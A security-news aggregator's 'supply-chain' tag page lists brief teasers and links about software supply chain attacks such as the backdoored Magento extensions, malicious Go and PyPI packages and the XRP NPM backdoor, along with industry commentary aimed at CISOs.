Tag: supply-chain
-
Sansec uncovered a supply chain attack via 21 backdoored Magento extensions
Supply chain attack via 21 backdoored Magento extensions hit 5001,000 e-stores, including a $40B multinational. Sansec researchers reported that multiple vendors were hacked in a coordinated supply chain attack, the experts discovered that a backdoor was hidden in 21 applications. Curiously, the malicious code was injected 6 years ago, but the supply chain attack was…
-
Inside the Relentless Liability Pressures Facing CISOs
SolarWinds CISO Tim Brown’s Case Shows Personal, Legal and Health Risks for CISOs. CISOs face tremendous stress in dealing with regulatory scrutiny and legal exposure in the wake of a data breach. SolarWinds CISO Tim Brown shares the personal and professional impact of Securities and Exchange Commission charges against him after the 2020 SolarWinds supply…
-
Hackers Weaponize Go Modules to Deliver Disk”‘Wiping Malware, Causing Massive Data Loss
Tags: attack, cyber, cybersecurity, data, exploit, github, hacker, malicious, malware, programming, sans, supply-chainCybersecurity researchers uncovered a sophisticated supply chain attack targeting the Go programming language ecosystem in April 2025. Hackers have weaponized three malicious Go modules-github[.]com/truthfulpharm/prototransform, github[.]com/blankloggia/go-mcp, and github[.]com/steelpoor/tlsproxy-to deploy devastating disk-wiping malware. Leveraging the decentralized nature of Go’s module system, where developers directly import dependencies from public repositories like GitHub sans centralized gatekeeping, attackers exploit namespace…
-
Malicious Go Modules Deliver Disk-Wiping Linux Malware in Advanced Supply Chain Attack
Cybersecurity researchers have discovered three malicious Go modules that include obfuscated code to fetch next-stage payloads that can irrevocably overwrite a Linux system’s primary disk and render it unbootable.The names of the packages are listed below -github[.]com/truthfulpharm/prototransformgithub[.]com/blankloggia/go-mcpgithub[.]com/steelpoor/tlsproxy”Despite appearing legitimate, First seen on thehackernews.com Jump to article: thehackernews.com/2025/05/malicious-go-modules-deliver-disk.html
-
Hackers Exploit Critical NodeJS Vulnerabilities to Hijack Jenkins Agents for RCE
Tags: cyber, exploit, flaw, github, hacker, infrastructure, rce, remote-code-execution, risk, supply-chain, vulnerabilitySecurity researchers have identified critical vulnerabilities in the Node.js CI/CD infrastructure, exposing internal Jenkins agents to remote code execution and raising the risk of supply chain attacks. These flaws stemmed from the integration and communication gaps between multiple DevOps platforms-specifically GitHub Apps, GitHub Actions workflows, and Jenkins pipelines-that collectively manage Node.js’ continuous integration processes. Exploiting…
-
Magento supply chain attack compromises hundreds of e-stores
A supply chain attack involving 21 backdoored Magento extensions has compromised between 500 and 1,000 e-commerce stores, including one belonging to a $40 billion multinational. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/magento-supply-chain-attack-compromises-hundreds-of-e-stores/
-
Seven Malicious Packages Exploit Gmail SMTP to Run Harmful Commands
Tags: control, cyber, exploit, malicious, open-source, security-incident, service, supply-chain, threatA major supply chain security incident has rocked the Python open-source community as researchers at Socket’s Threat Research Team uncovered seven interconnected malicious packages published on the Python Package Index (PyPI). These packages Coffin-Codes-Pro, Coffin-Codes-NET2, Coffin-Codes-NET, Coffin-Codes-2022, Coffin2022, Coffin-Grave, and cfc-bsb-were ingeniously designed to exploit Gmail’s SMTP service, establishing covert command-and-control tunnels and enabling attackers to execute…
-
Operational impacts top list of vendor risk worries, study finds
The report comes as years of supply chain cyberattacks shine a spotlight on third-party risks. First seen on cybersecuritydive.com Jump to article: www.cybersecuritydive.com/news/third-party-risk-cyberattacks-supply-chain-ey-survey/746877/
-
How CISOs Can Strengthen Supply Chain Security in 2025
The responsibilities of Chief Information Security Officers (CISOs) are rapidly evolving as digital transformation and global interconnectivity reshape the modern supply chain. In 2025, the supply chain will be more than just a logistical function; it will be a complex, dynamic web of partners, vendors, and technologies, each introducing new vulnerabilities and attack vectors. High-profile…
-
The CISO’s Guide to Effective Cloud Security Strategies
As organizations accelerate cloud adoption, CISOs face unprecedented challenges securing dynamic, multi-cloud environments. The shift to cloud-native architectures, hybrid workloads, and decentralized data storage has expanded the attack surface, exposing enterprises to sophisticated threats like supply chain compromises, misconfigured APIs, and insider risks. With 70% of breaches now linked to cloud assets, CISOs must balance…
-
CNAPP-Kaufratgeber
Tags: access, ai, application-security, attack, authentication, cloud, container, detection, edr, encryption, framework, group, ibm, infrastructure, intelligence, kubernetes, linux, ml, monitoring, network, open-source, risk-management, saas, soar, software, supply-chain, threat, tool, vmware -
Securing the invisible: Supply chain security trends
Adversaries are infiltrating upstream software, hardware, and vendor relationships to quietly compromise downstream targets. Whether it’s a malicious update injected into a … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2025/04/30/supply-chain-security-trends/
-
JPMorgan Chase CISO Warns of SaaS Security Crisis and Supply Chain Risk
In an open letter, Patrick Opet, Chief Information Security Officer (CISO) at JPMorgan Chase, raises a critical alarm First seen on securityonline.info Jump to article: securityonline.info/jpmorgan-chase-ciso-warns-of-saas-security-crisis-and-supply-chain-risk/
-
AI-generated code could be a disaster for the software supply chain. Here’s why.
LLM-produced code could make us much more vulnerable to supply-chain attacks. First seen on arstechnica.com Jump to article: arstechnica.com/security/2025/04/ai-generated-code-could-be-a-disaster-for-the-software-supply-chain-heres-why/
-
JPMorgan Chase CISO warns software industry on supply chain security
In an open letter, Patrick Opet said third-party vendors need to embrace secure development practices over speed to market.; First seen on cybersecuritydive.com Jump to article: www.cybersecuritydive.com/news/jpmorgan-chase-ciso–software-supply-chain-security/746476/
-
The API Imperative: Securing Agentic AI and Beyond
We recently released The Rise of Agentic AI, our API ThreatStats report for Q1 2025, finding that evolving API threats are fueled by the rise of agentic AI systems, growing complexity in cloud-native infrastructure, and a surge in software supply chain risks, and uncovered patterns and actionable insights to help organizations prioritize risks and harden their…
-
Most critical vulnerabilities aren’t worth your attention
Web applications face a wide range of risks, including known-exploitable vulnerabilities, supply chain attacks, and insecure identity configurations in CI/CD, according to the … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2025/04/28/datadog-state-of-devsecops-2025/
-
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 43
Tags: attack, backdoor, botnet, china, crypto, fraud, infrastructure, international, malware, nfc, rust, supply-chainSecurity Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Inside Gamaredon’s PteroLNK: Dead Drop Resolvers and evasive Infrastructure XRP supply chain attack: Official NPM package infected with crypto stealing backdoor SuperCard X: exposing a Chinese-speaker MaaS for NFC Relay fraud operation New Rust Botnet >>RustoBot
-
What is the xBOM?
Tags: cloud, cryptography, cyber, Hardware, international, resilience, risk, sbom, service, software, supply-chain, technology, tool -
ISMG Editors: Top 2025 Breach Trends From Verizon
Also: Supply Chain Security in Wake of US Tariffs, AI’s Role in the SOC. In this week’s update, ISMG editors discussed takeaways from Verizon’s annual Data Breach Investigations Report, the cybersecurity ripple effects of the disruptive U.S. tariff policy, and why artificial intelligence tools still aren’t ready to take over the security operations center. First…
-
Three-Year Go Module Mirror Backdoor Exposed: Supply Chain Attack
Discover how a backdoored Go package exploited the module mirror for 3+ years. Learn vital security practices to safeguard your code. First seen on securityboulevard.com Jump to article: securityboulevard.com/2025/04/three-year-go-module-mirror-backdoor-exposed-supply-chain-attack/
-
Operation SyncHole: Lazarus APT targets supply chains in South Korea
The North Korea-linked Lazarus Group targeted at least six firms in South Korea in a cyber espionage campaign called Operation SyncHole. Kaspersky researchers reported that the North Korea-linked APT group Lazarus targeted at least six firms in South Korea in a cyber espionage campaign tracked as Operation SyncHole. The campaign has been active since at…
-
Software supply chain security AI agents take action
Three software supply chain security vendors join the AI agent trend that is sweeping tech, as AI-generated code threatens to overwhelm human security pros. First seen on techtarget.com Jump to article: www.techtarget.com/searchitoperations/news/366623140/Software-supply-chain-security-AI-agents-take-action
-
Backdoor Found in Official XRP Ledger NPM Package
XRP Ledger SDK hit by supply chain attack: Malicious NPM versions stole private keys; users urged to update… First seen on hackread.com Jump to article: hackread.com/backdoor-found-in-official-xrp-ledger-npm-package/
-
HYCU Tackles SaaS Data Protection With New R-Shield Solution
HYCU introduces R-Shield to provide comprehensive cyber resilience across SaaS, cloud, and on-premises environments as organizations face growing supply chain attacks. First seen on securityboulevard.com Jump to article: securityboulevard.com/2025/04/hycu-tackles-saas-data-protection-with-new-r-shield-solution/